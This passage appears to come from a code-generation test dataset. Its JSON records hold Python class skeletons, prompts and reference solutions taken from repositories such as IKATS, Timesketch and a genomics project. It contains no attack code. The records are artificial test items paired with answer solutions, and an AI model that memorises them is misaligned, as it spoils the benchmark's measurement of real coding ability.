FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! 
not an instance !!!)\"\"\"\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length as output_arg_names: each element is either None or instance of Data\"\"\"\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Instantiates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional (default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/ikats/processing/apps/algo/execute/models/business/facade.py", "source_repo": "IKATS/ikats-pybase", "split": "test", "star_events_count": 0} {"blob_id": "66f4852fd4f4ffadd33f36f25760bfa23338c89c", "bodies": ["sketch = Sketch.query.get_with_acl(sketch_id)\nif not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\nquestion = InvestigativeQuestion.query.get(question_id)\nif not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\nconclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\nreturn self.to_json(conclusions)", "sketch = 
Sketch.query.get_with_acl(sketch_id)\nif not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\nquestion = InvestigativeQuestion.query.get(question_id)\nif not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\nconclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\nform = request.json\nif not form:\n form = request.data\nconclusion_text = form.get('conclusionText')\nif conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\nreturn self.to_json(conclusion)"], "bodies_text": "<|body_start_0|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n<|end_body_0|>\n\n<|body_start_1|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n<|end_body_1|>\n", "class_docstring": "Resource for investigative question conclusion.", "class_name": "QuestionConclusionListResource", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n <|body_0|>\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. 
Returns: A JSON representation of the conclusion.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n<|end_body_0|>\n\n<|body_start_1|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000456", "length_bytes": 15391, "license_type": "permissive", "methods": [{"docstring": "Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.", "name": "get", "signature": "def get(self, sketch_id, question_id)"}, {"docstring": "Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.", "name": "post", "signature": "def post(self, sketch_id, question_id)"}], "n_methods": 2, "prompt": "Implement the Python class `QuestionConclusionListResource` described below.\n\nClass description:\nResource for investigative question conclusion.\n\nMethod signatures and docstrings:\n- def get(self, sketch_id, question_id): Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\n- def post(self, sketch_id, question_id): Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.", "prompted_full_text": "Implement the Python class `QuestionConclusionListResource` described below.\n\nClass description:\nResource for investigative question conclusion.\n\nMethod signatures and docstrings:\n- def get(self, sketch_id, question_id): Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\n- def post(self, sketch_id, question_id): Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.\n\n<|skeleton|>\nclass QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n <|body_0|>\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. 
Returns: A JSON representation of the conclusion.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n<|end_body_0|>\n\n<|body_start_1|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n<|end_body_1|>\n", "revision_id": "24f471b58ca4a87cb053961b5f05c07a544ca7b8", "skeleton": "<|skeleton|>\nclass QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n <|body_0|>\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. 
Returns: A JSON representation of the conclusion.\"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n", "source": "the_stack_v2_python_sparse", "source_path": "timesketch/api/v1/resources/scenarios.py", "source_repo": "google/timesketch", "split": "test", "star_events_count": 2263} {"blob_id": "0afd4d6d8b8c52b30b8fe331a2ff48e628a88e87", "bodies": ["bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\nsingle_layer = bsscs.create_layer(512, activation=tf.nn.relu)\nself.assertTrue(single_layer != None)", "bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\ninput_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\nlabels_ph = tf.placeholder(tf.float32, shape=[None, 2])\nloss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\nself.assertTrue(loss_function != None)\nloss_function_var = bsscs.get_loss()\nself.assertTrue(loss_function_var == loss_function)", "bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\noptimizer = bsscs.create_optimizer()\nself.assertTrue(optimizer != None)\noptimizer_var = bsscs.get_optimizer()\nself.assertTrue(optimizer == optimizer_var)", "bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\nclassifier = bsscs.create_classifier([125, 12])\nself.assertTrue(classifier != None)"], "bodies_text": "<|body_start_0|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n<|end_body_0|>\n\n<|body_start_1|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n<|end_body_1|>\n\n<|body_start_2|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n<|end_body_2|>\n\n<|body_start_3|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), 
learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n<|end_body_3|>\n", "class_docstring": "", "class_name": "ClassifierNetworkTests", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ClassifierNetworkTests:\n\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n <|body_0|>\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n <|body_1|>\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n <|body_2|>\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n<|end_body_0|>\n\n<|body_start_1|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n<|end_body_1|>\n\n<|body_start_2|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n<|end_body_2|>\n\n<|body_start_3|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000457", "length_bytes": 3035, "license_type": "no_license", "methods": [{"docstring": "Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created", "name": "test_layer_creation", "signature": "def test_layer_creation(self)"}, {"docstring": "Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists", "name": "test_loss_creation", "signature": "def test_loss_creation(self)"}, {"docstring": "Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created", "name": "test_optimizer_creation", "signature": "def test_optimizer_creation(self)"}, 
{"docstring": "Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions", "name": "test_classifier_creation", "signature": "def test_classifier_creation(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_val_000308", "prompt": "Implement the Python class `ClassifierNetworkTests` described below.\n\nClass description:\nImplement the ClassifierNetworkTests class.\n\nMethod signatures and docstrings:\n- def test_layer_creation(self): Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\n- def test_loss_creation(self): Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\n- def test_optimizer_creation(self): Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\n- def test_classifier_creation(self): Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions", "prompted_full_text": "Implement the Python class `ClassifierNetworkTests` described below.\n\nClass description:\nImplement the ClassifierNetworkTests class.\n\nMethod signatures and docstrings:\n- def test_layer_creation(self): Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\n- def test_loss_creation(self): Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\n- def test_optimizer_creation(self): Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\n- def test_classifier_creation(self): Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\n\n<|skeleton|>\nclass ClassifierNetworkTests:\n\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n <|body_0|>\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n <|body_1|>\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n <|body_2|>\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n<|end_body_0|>\n\n<|body_start_1|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n 
input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n<|end_body_1|>\n\n<|body_start_2|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n<|end_body_2|>\n\n<|body_start_3|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n<|end_body_3|>\n", "revision_id": "d665ca405bdf35fdb57f8149a10b90be82d8de22", "skeleton": "<|skeleton|>\nclass ClassifierNetworkTests:\n\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n <|body_0|>\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n <|body_1|>\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n <|body_2|>\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ClassifierNetworkTests:\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, 
steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n", "source": "the_stack_v2_python_sparse", "source_path": "BSSCSFramework/classifier_tests.py", "source_repo": "wezleysherman/TBI-NN-421", "split": "test", "star_events_count": 3} {"blob_id": "823ff152610a1f07d0dbd0253c7125d1a92e4077", "bodies": ["self.data = {}\ncancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\nnormal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\ncancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\nnormal_consensus_qualities = get_consensus_qualities(normal_ann_file)\nconsensus_qualities = {}\nconsensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\nconsensus_qualities[sample_name + 'N'] = normal_consensus_qualities\nfor exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)", "inherited = defaultdict(dict)\nsomatic = defaultdict(dict)\nfor exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\nreturn (inherited, somatic)", "inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\nif somatic_or_inherited == 'somatic':\n use_muts = somatic\nelse:\n use_muts = inherited\nwith open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')", "inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\nwrite_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\nwrite_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')"], "bodies_text": "<|body_start_0|>\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n 
consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n<|end_body_0|>\n\n<|body_start_1|>\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n<|end_body_1|>\n\n<|body_start_2|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n<|end_body_2|>\n\n<|body_start_3|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n<|end_body_3|>\n", "class_docstring": "Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples", "class_name": "calls", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n <|body_0|>\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n <|body_1|>\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n <|body_2|>\n\n def mk_MU2A_input(exome_type, 